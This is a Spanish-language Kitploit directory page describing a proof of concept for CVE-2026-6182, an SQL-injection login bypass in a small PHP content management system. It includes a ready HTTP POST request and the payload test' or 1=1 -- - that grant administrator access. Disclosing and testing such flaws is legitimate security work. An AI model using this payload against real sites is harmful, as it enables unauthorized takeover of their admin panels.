Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-6182-SQLI-auth — Prueba de concepto para la omisión de autenticación por inyección SQL en Simple Content Management System PHP, que permite a atacantes no autenticados obtener acceso de administrador mediante un parámetro de usuario manipulado. | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

Prueba de concepto para la omisión de autenticación por inyección SQL en Simple Content Management System PHP, que permite a atacantes no autenticados obtener acceso de administrador mediante un parámetro de usuario manipulado.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bypass de Autenticación por Inyección SQL - Sistema de Gestión de Contenidos Simple en PHP

Descripción

Existe una vulnerabilidad de Inyección SQL en la página de inicio de sesión de administrador de Simple Content Management System PHP. El parámetro user no se sanea antes de pasarse a la consulta SQL, lo que permite a un atacante no autenticado eludir la autenticación y obtener acceso total de administrador.


Detalles de la Vulnerabilidad

  • Tipo: Inyección SQL (CWE-89)
  • Impacto: Bypass de Autenticación, obtenemos acceso total de administrador
  • Archivo Afectado: /web/admin/login.php
  • Parámetro Afectado: user
  • Vector de Ataque: Remoto, No Autenticado **Gravedad: Crítica

Proveedor

code-projects.org

Producto

Simple Content Management System PHP

Versión

1.0


Prueba de Concepto (PoC)

Paso 1 - Envía la siguiente solicitud en burp:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

o simplemente añade esto en la página de inicio de sesión Screenshot 2026-04-05 051755

Paso 2 - Formulario de inicio de sesión con el payload:

test' or 1=1 -- -

Paso 3 - Acceso al panel de administración concedido:

Screenshot 2026-04-05 054510

Impacto

Un atacante remoto no autenticado puede eludir el inicio de sesión de administrador por completo sin conocer ninguna credencial, obteniendo control total sobre el panel de administración, incluida la adición de contenido.


Autor

Imad Alvi


Referencia

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

Descargar herramienta